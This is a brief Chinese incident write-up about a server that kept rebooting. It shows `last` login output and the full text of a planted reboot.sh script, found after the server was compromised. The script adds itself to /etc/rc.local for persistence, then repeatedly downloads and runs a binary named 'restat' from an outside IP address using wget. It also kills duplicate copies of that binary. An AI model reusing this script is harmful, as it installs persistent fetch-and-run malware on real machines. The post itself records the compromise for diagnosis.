现象：服务器无故重启。

查看原因：

# last | head -15r00t     tty1                          Thu May 21 04:57 - 04:58  (00:00)    reboot   system boot  2.6.32-358.el6.x Thu May 21 04:56 - 04:58  (00:01)    r00t     tty1                          Thu May 21 04:52 - down   (00:03)    r00t     tty1                          Thu May 21 04:42 - 04:52  (00:09)

被***，植入了reboot.sh脚本导致。

#!/bin/bashif [ "sh /etc/reboot.sh &" = "$(cat /etc/rc.local | grep /etc/reboot.sh | grep -v grep)" ]; then    echo ""else    echo "sh /etc/reboot.sh &" >> /etc/rc.localfiwhile [ 1 ]; do    restat_killn=$(ps aux | grep "/etc/restat" | grep -v grep | wc -l)    if [[ $restat_killn -eq 0 ]]; then        if [ ! -f "/etc/restat" ]; then            if [ -f "/usr/bin/wget" ]; then                cp /usr/bin/wget .                chmod +x wget                #./wget -P . http://115.230.127.95:523/restat                ./wget -P /etc/ http://115.230.127.95:523/restat &> /dev/null                chmod 777 /etc/restat                rm wget -rf            else                echo "No wget"            fi        fi        /etc/restat &        #./restat &    elif [[ $restat_killn -gt 1 ]]; then        for killed in $(ps aux | grep "restat" | grep -v grep | awk '{print $2}'); do            restat_killn=$(($restat_killn-1))            if [[ $restat_killn -eq 1 ]]; then                continue            else                kill -9 $killed            fi        done    else        echo ""    fi    sleep 60done